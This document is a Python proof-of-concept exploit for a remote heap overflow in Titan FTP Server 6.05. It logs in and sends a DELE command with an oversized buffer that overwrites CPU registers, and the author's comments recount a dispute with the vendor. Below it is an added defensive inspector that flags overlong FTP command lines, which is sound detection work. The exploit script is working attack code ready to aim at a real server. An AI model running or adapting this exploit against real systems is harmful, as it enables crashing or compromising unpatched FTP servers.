`#!/usr/bin/python
#
# First of all, thanks to my wife Edita.
#
# Remote Heap overflow in Titan FTP Server version 6.05 build 550
# (DELE ) - probably other commands are vulnerable too
# PoC tested on WinXP sp1
# EAX and ESI are overwritten with 41414141 and 44444444
#
# Greetz to muts, m1k1, bolexxx
# and crew from offsec, remote-exploit.org, Cedes.ba, Itas and Cikom :)
#
# "Actually, we always release patches to customers first, then to the
# general public a few days later.
# So both the User/Pass issue and your issue are basically invalid as they
# were already fixed by the time you ran
# your tests."
# This was the last answer from the vendor when I contacted them. They asked me
# which version I used, I said "the last one,
# 6.05 build 550". They said there is a patched/fixed release 6.10, then I
# asked where? Then, they sent me the mail you
# see above.
#
# Coded by Muris Kurgas a.k.a j0rgan < muris [at] cg [dot] yu >
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\nSaljem zli bafer..."
buffer = '\x90' * 20519 + "A" * 4 + "D" * 4 + "B" * 55000
s.connect(('192.168.1.9',21))
data = s.recv(1024)
s.send('USER ftp' +'\r\n')
data = s.recv(1024)
s.send('PASS ftp' +'\r\n')
data = s.recv(1024)
print "\nBum! Bum! Bum! :)"
s.send('DELE ' +buffer+'\r\n')
s.close()
# be safe,
# j0rgan
`
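A defensive counterpart to the PoC above, added here and not part of the original advisory or of any vendor code: a Python 3 inspector that reassembles the client side of an FTP control stream and flags command lines longer than a policy limit, which is the shape of the oversized `DELE` argument the PoC sends. The 512-byte limit and all class and function names are assumptions chosen for illustration.

```python
MAX_LINE = 512  # assumed policy limit; RFC 959 defines no maximum line length

class FtpCommandInspector:
    """Reassemble a client-to-server FTP control stream and report
    command lines longer than max_line bytes (line terminator excluded)."""

    def __init__(self, max_line=MAX_LINE):
        self.max_line = max_line
        self.buf = b""
        self.overflowing = False  # True while discarding an already-reported line

    def feed(self, chunk):
        """Feed one TCP payload; return [(verb, length_or_None), ...]."""
        alerts = []
        self.buf += chunk
        while True:
            line, sep, rest = self.buf.partition(b"\n")
            if not sep:
                # Unterminated data: alert once the limit is passed, then stop
                # buffering so the sensor's own memory stays bounded.
                if len(self.buf) > self.max_line and not self.overflowing:
                    alerts.append((self._verb(self.buf), None))
                    self.overflowing = True
                if self.overflowing:
                    self.buf = b""
                return alerts
            self.buf = rest
            if self.overflowing:
                self.overflowing = False  # tail of a line reported earlier
                continue
            line = line.rstrip(b"\r")
            if len(line) > self.max_line:
                alerts.append((self._verb(line), len(line)))

    @staticmethod
    def _verb(line):
        # Report only the command verb, never the oversized argument.
        return line.split(b" ", 1)[0][:8].decode("ascii", "replace").upper()

def inspect_segments(segments, max_line=MAX_LINE):
    """Run constructed or captured payloads through one inspector."""
    insp = FtpCommandInspector(max_line)
    return [a for seg in segments for a in insp.feed(seg)]

# Constructed sample session (not captured traffic): a login followed by a
# DELE whose 2000-byte argument arrives split across two segments.
SAMPLE = [b"USER ftp\r\nPASS ftp\r\n", b"DELE " + b"x" * 1000,
          b"x" * 1000 + b"\r\nNOOP\r\n"]
if __name__ == "__main__":
    print(inspect_segments(SAMPLE))
```

A length of `None` in an alert means the limit was exceeded before any line terminator arrived, so the final size was not measured.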